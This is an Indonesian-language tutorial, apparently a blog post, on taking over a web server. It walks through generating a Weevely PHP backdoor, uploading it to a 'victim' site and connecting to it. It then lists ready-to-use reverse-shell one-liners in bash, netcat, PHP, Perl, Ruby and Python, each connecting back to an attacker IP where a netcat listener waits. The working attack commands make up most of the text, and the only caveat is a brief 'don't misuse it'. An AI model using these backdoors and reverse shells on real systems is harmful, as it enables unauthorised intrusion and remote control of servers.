Cara menggunakan php-reverse shell

Cara menggunakan php-reverse shell

 

Oke, Saya akan berbagi tutorial Penetration Testing lagi dengan menggunakan Tools Weevely. Tools ini memungkinkan kamu untuk mengakses server Victim dengan Command Line, sama halnya dengan Back Connect tapi dengan Weevely ini sedikit berbeda.

Nah sekarang untuk menggunakanya kamu bisa mengikuti perintah berikut :

$ git clone https://github.com/epinna/weevely3.git

Sekarang tunggu hingga proses clone selesai. Jika sudah selanjutnya kamu bisa mengetikan perintah berikut :

$ sudo apt-get install -y python3 python3-pip curl

Tunggu hingga proses installasi selesai, selanjutnya kamu bisa mengetikan perintah dibawah ini :

$ cd weevely3/

$ sudo pip3 install -r requirements.txt --upgrade

Setelah semuanya sudah siap, sekarang kita jalankan Weevely dengan perintah berikut :

$ python3 weevely.py

Jika sudah maka tampilan nya akan seperti ini :

Cara menggunakan php-reverse shell

Seperti pada gambar diatas ada keterangan bagaimana cara penggunaan nya, jadi pertama kamu harus meng-generate file backdoor yang nantinya bisa kamu upload ke situs  Victim. Nah saya akan menjadikan komputer saya sebagai Victim, sekarang kita bisa membuat backdoor dengan perintah berikut :

$ python3 weevely.py generate password /path/to/backdoor.php

Password nya sesuaikan dengan keinginan kamu dan path nya ini untuk menyimpan file backdoor nya mau dimana. Sebagai contoh saya akan menyimpan nya di folder ~/pentest/ untuk lebih jelas nya lihat gambar dibawah ini :

Cara menggunakan php-reverse shell

File backdoor sudah dibuat, sekarang kita upload ke situs Victim. Lihat gambar dibawah ini :

Cara menggunakan php-reverse shell

Jika sudah kita panggil file backdoor.php di terminal dengan menggunakan weevely, kamu bisa mengikuti perintah dibawah ini :

$ python3 weevely.py victim.com/uploads/backdoor.php password

Masukan url dari victim dan password yang sudah tadi kamu buat untuk meng-generate backdoor. Lihat gambar dibawah ini :

Cara menggunakan php-reverse shell

Nah sekarang kita sudah masuk ke server target, untuk mengetahui perintah apa saja yang bisa kita gunakan untuk menjalankan Weevely, kamu bisa mengetikan perintah :help, lihat gambar dibawah ini :

Cara menggunakan php-reverse shell

Untuk lebih lengkap nya kamu bisa cek sendiri. Sekarang saya akan coba untuk melakukan perintah touch untuk membuat file baru. Lihat gambar dibawah ini :

Cara menggunakan php-reverse shell

Oke semoga tutorial ini bermanfaat, ingat! jangan disalah gunakan ya :)

Kali ini saya akan membahas beberapa cara untuk mendapatkan shell interaktif ketika kita berhasil menemukan celah Command Execution Vulnerability saat melakukan penetration testing. Pilihan kita untuk melakukan reverse shell terbatas pada bahasa pemrograman apa yang terinstall di server target. Nah kali ini saya akan membahas beberapa opsi / command untuk melakukan reverse shell dari php, python, ruby, dll.

Sebelum melakukan reverse shell, pastikan di komputer kita ( attacker ) sudah melakukan listening menggunakan netcat.

sudo nc -l 1337

1337 adalah port yang akan kita buka. Silahkan diubah sesuai selera kalian.

1. Reverse Shell dari Bash

Bash dapat digunakan untuk melakukan reverse shell.

Cara menggunakan php-reverse shell

Dari komputer / server target kita masukkan command berikut :

bash -i >& /dev/tcp/192.168.48.133/1337 0>&1

192.168.48.133 adalah ip attacker.

1337 adalah port yang kita buka sebelumnya di command listening menggunakan netcat.

2. Reverse Shell Menggunakan Netcat

Netcat juga bisa digunakan untuk melakukan reverse shell .

Cara menggunakan php-reverse shell

Dari komputer target kita masukkan perintah berikut :

/bin/nc.traditional -e /bin/sh 92.168.48.133 1337

3. Reverse Shell Menggunakan PHP

Cara menggunakan php-reverse shell

Command :

php -r '$sock=fsockopen("192.168.48.133",1337);exec("/bin/sh -i <&3 >&3 2>&3");'

Jika gagal, ubah angka file descriptor dari 3 ke 4, 5, atau 6.

4. Reverse Shell Menggunakan Perl

Perl juga bisa digunakan untuk melakukan reverse shell.

Cara menggunakan php-reverse shell

Perintah :

perl -e 'use Socket;$i="192.168.48.133";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

5. Reverse Shell menggunakan Ruby

Ruby juga memungkinkan kita untuk melakukan reverse shell.

Cara menggunakan php-reverse shell

Perintah :

ruby -rsocket -e'f=TCPSocket.open("192.168.48.133",1337).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

6. Reverse Shell Menggunakan Python

Yang terakhir adalah Python.

Cara menggunakan php-reverse shell

Command :

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.48.133",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Nah sekian tutorial kali ini, semoga bermanfaat. Jangan lupa share biar makin banyak yang tau.